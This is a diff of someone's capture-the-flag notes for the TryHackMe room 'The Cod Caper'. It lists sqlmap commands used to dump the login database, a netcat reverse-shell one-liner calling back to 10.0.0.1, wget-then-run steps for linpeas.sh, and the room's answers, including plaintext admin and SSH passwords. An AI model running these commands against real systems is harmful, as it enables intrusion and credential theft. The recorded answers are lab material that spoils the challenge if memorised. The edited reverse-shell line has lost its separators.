JianKo/ctfNote/thm/The_Cod_Caper/README.md

 1.sqlmap -u {IP} --data "username=&password="  --form

 2.sqlmap -u {IP} --data "username=&password=" --data 'username=&password='-a
- &nbsp;2.1 do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y &nbsp;2.2. do you want to perform a dictionary-based attack against retrieved password hashes?
-[Y/n/q] y &nbsp;2.3. what dictionary do you want to use : 1 &nbsp;&nbsp; [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter) &nbsp;&nbsp; [2] custom dictionary file
+ 2.1 do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y 2.2. do you want to perform a dictionary-based attack against retrieved password hashes?
+[Y/n/q] y 2.3. what dictionary do you want to use : 1
+   [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file
-  &nbsp;&nbsp; [3] file with list of dictionary files &nbsp; 2.4. do you want to use common password suffixes? (slow!) [y/N] N 3.sqlmap -u http://{IP}/administrator.php --data 'username=&password=' --dbs
+   [3] file with list of dictionary files
+   2.4. do you want to use common password suffixes? (slow!) [y/N] N

+3.sqlmap -u http://{IP}/administrator.php --data 'username=&password=' --dbs

 4.sqlmap -u http://10.10.223.60/administrator.php --data "username=&password=" -D users --tables

 5.sqlmap -u http://10.10.223.60/administrator.php --data "username=&password=" -D users -T users --dump

-1.What is the admin username? : pingudad
+1.What is the admin username?
+: pingudad
-2.What is the admin password? : secretpass
+2.What is the admin password?
+: secretpass
 3.How many forms of SQLI is the form vulnerable to?
-3
+: 3
 ```

 ***TASK 5: Command Execution***
 ```
 1.How many files are in the current directory?
-3
+: 3

-2.Do I still have an account : yes
+2.Do I still have an account
+: yes

 3 What is my ssh password? :pinguapingu
-&nbsp; 3.1 reverse shell command
+ 3.1 reverse shell command
    - Listen Command : nc -lvnp 4444
-       - reverse shell connect command : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
+   - reverse shell connect command : rm /tmp/fmkfifo /tmp/fcat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
    - I thinked for find ssh password
    - 1st See that log file ...if the "/var" directory?
    - ssh password is
 ```

 ***TASK 6: LinEnum***
 ```
-1. What is the interesting path of the interesting suid file? : /opt/secret/root
+1. What is the interesting path of the interesting suid file?
+: /opt/secret/root
 - python3 -m http.server 780
 - wget http://{IP}/linpeas.sh
 - ./linpeas.sh